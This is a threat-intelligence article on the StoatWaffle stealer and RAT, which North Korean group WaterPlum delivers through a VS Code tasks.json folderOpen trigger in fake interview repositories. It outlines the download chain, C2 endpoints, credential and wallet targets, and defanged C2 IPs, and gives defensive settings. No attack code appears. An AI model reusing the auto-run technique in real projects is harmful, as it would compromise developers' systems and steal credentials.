WaterPlum's VS Code Trap: How Opening a Folder Deploys a RAT

- 6 mins read

Commissioned, Curated and Published by Russ. Researched and written with AI.

What’s New This Week

North Korean threat group WaterPlum, the operators behind the long-running Contagious Interview campaign, have a new trick. Instead of convincing developers to run suspicious commands during a fake technical interview, they’ve moved the trigger into the editor itself. Open a project in VS Code, grant folder trust, and you’re already compromised. The mechanism is a single key in .vscode/tasks.json. It’s been live since December 2025, and it took three months for researchers to formally document it.

Changelog

DateSummary
25 Mar 2026Initial publication.

The attack doesn’t require you to run anything. That’s what makes it different.

WaterPlum – the North Korean threat group behind the Contagious Interview campaign – has been deploying a new malware family called StoatWaffle since approximately December 2025. The delivery mechanism is a .vscode/tasks.json file with one specific setting: runOn: folderOpen. When a developer opens the malicious repository in VS Code and clicks “Trust” on the workspace prompt, the payload executes automatically.

No additional commands. No “run this to complete your assessment.” Just: open folder, done.

The Mechanism

VS Code’s task runner is a legitimate feature. You define tasks in .vscode/tasks.json – build steps, test runners, formatters. The runOn: folderOpen option tells VS Code to execute a task automatically every time the project folder is opened. It’s designed for things like starting a dev server.

WaterPlum configured this to download a payload from a Vercel-hosted web application. The payload runs regardless of operating system.

According to NTT Security’s analysis of StoatWaffle, the chain works like this:

  1. Victim opens the malicious repository in VS Code and trusts the workspace
  2. tasks.json triggers immediately, downloading an initial script from Vercel
  3. That script runs via cmd.exe on Windows (equivalent on other platforms)
  4. The downloader checks whether Node.js is installed. If not, it downloads and installs it from the official Node.js website
  5. It then downloads env.npl and package.json, executing env.npl via Node.js
  6. env.npl polls /api/errorMessage on a C2 server every 5 seconds, executing any response as Node.js code
  7. About 5 minutes in, a second downloader arrives, polling a different C2 endpoint (/api/handleErrors) on the same server, also every 5 seconds
  8. The Stealer and RAT modules deploy from that second downloader

The whole thing is modular and Node.js-based. NTT Security describe it as “a modular malware implemented by Node.js” with Stealer and RAT components. Because it runs as Node.js, it works across Windows, macOS, and Linux without modification.

What StoatWaffle Does

The Stealer module targets browser credentials. For Chromium-family browsers, it grabs stored credentials and browser extension data. For Firefox, it reads extensions.json to enumerate installed extensions and checks against a keyword list – the researchers don’t specify the full list, but this targeting suggests specific crypto wallets and password manager extensions.

On macOS, the Stealer also copies the iCloud Keychain database.

Stolen files get copied to a temporary directory with a random name, then uploaded to /upload on the C2 server. Separately, a list of installed software on the victim host goes to /uploadsecond. The Stealer also checks whether it’s running inside WSL. If so, it resolves the Windows user profile path using wslpath – a specific adaptation to grab Windows data from a Linux process.

The RAT module maintains persistent communication with the C2 server. NTT Security documented its command set: change working directory, enumerate files and directories, execute Node.js code, upload a file, recursively search directories and upload matching files, run shell commands, and terminate itself.

That last one matters. The RAT can clean up on command, making forensic analysis harder after exfiltration.

The Delivery Chain

WaterPlum delivers this via fake job interviews. Microsoft’s analysis of Contagious Interview describes “convincingly staged recruitment processes” that mirror legitimate technical assessments. Victims receive a repository link – usually framed as an assignment or code review task – and are asked to open it and work through it.

The repositories are themed around blockchain development. That’s consistent across multiple campaigns WaterPlum has run. The fake GitHub, GitLab, or Bitbucket repos look plausible to a developer who’s been prepped to expect a crypto or Web3 engineering assessment.

Targets are not randomly selected. They’re typically founders, CTOs, and senior engineers in the cryptocurrency and Web3 space – people with elevated system access and, critically, access to company cryptocurrency wallets. A recent case documented by AllSecure.io involved an unsuccessful attempt against the company’s founder via a LinkedIn approach.

WaterPlum creates fake LinkedIn company pages to establish credibility, and builds out GitHub accounts with enough history to look legitimate. The infrastructure investment is significant.

The Broader Pattern

This VS Code attack is one thread in a much larger campaign. At the same time as StoatWaffle was being deployed, WaterPlum was:

  • Publishing malicious npm packages distributing PylangGhost, a Python-based backdoor (the first time it had been distributed via npm)
  • Compromising the Neutralinojs GitHub organisation by obtaining write access via a compromised long-time contributor, then force-pushing BeaverTail malware into the build pipeline, with payloads hidden in Tron, Aptos, and Binance Smart Chain transactions
  • Running the PolinRider campaign, implanting obfuscated JavaScript into hundreds of public GitHub repositories

The sub-group responsible for StoatWaffle is “Team 8” – also known as Moralis or Modilus family. This team previously used OtterCookie as their primary payload, switching to StoatWaffle around December 2025. The capability development here is continuous. NTT Security note directly that “WaterPlum is continuously developing new malware and updating existing ones.”

Sophos, tracking the activity as Nickel Alley, notes that “while these attacks appear to have a central goal of cryptocurrency theft, the threat group has demonstrated its intention to use initial access for further supply chain compromise or corporate espionage.” Victim profiling happens before the follow-on payload is selected.

Indicators of Compromise

NTT Security published IP-based IOCs from their investigation:

  • 185[.]163.125.196
  • 147[.]124.202.208
  • 163[.]245.194.216
  • 66[.]235.168.136
  • 87[.]236.177.9

Defang the brackets before use. These are C2 addresses from the investigated campaign; new infrastructure should be expected.

What You Can Do

The VS Code workspace trust prompt is your primary control here. VS Code will ask whether you trust the authors of a folder before executing workspace tasks. That prompt is doing real work – do not reflexively click through it.

For stricter control, VS Code’s task.allowAutomaticTasks setting can disable automatic task execution entirely. Set it to "off" in your user settings to prevent runOn: folderOpen tasks from running without explicit approval:

"task.allowAutomaticTasks": "off"

This doesn’t prevent VS Code from reading tasks.json – it just stops tasks from auto-executing. You’d still need to run them manually.

For developer teams processing untrusted repositories as part of interviews or assessments: use a dedicated VM or container. If you’re evaluating candidate code or third-party repositories regularly, that environment should not have access to your credentials, your browser data, or your keys.

WaterPlum is specifically targeting the moment in a developer’s workflow where professional context (a job interview, a code review) creates pressure to just open things and get on with it. The runOn: folderOpen mechanism exploits that pressure. The trust prompt stands between you and a compromised system – treat it like you would a sudo prompt, not a speed bump.

This tactic has been live since December 2025. Expect it to continue evolving.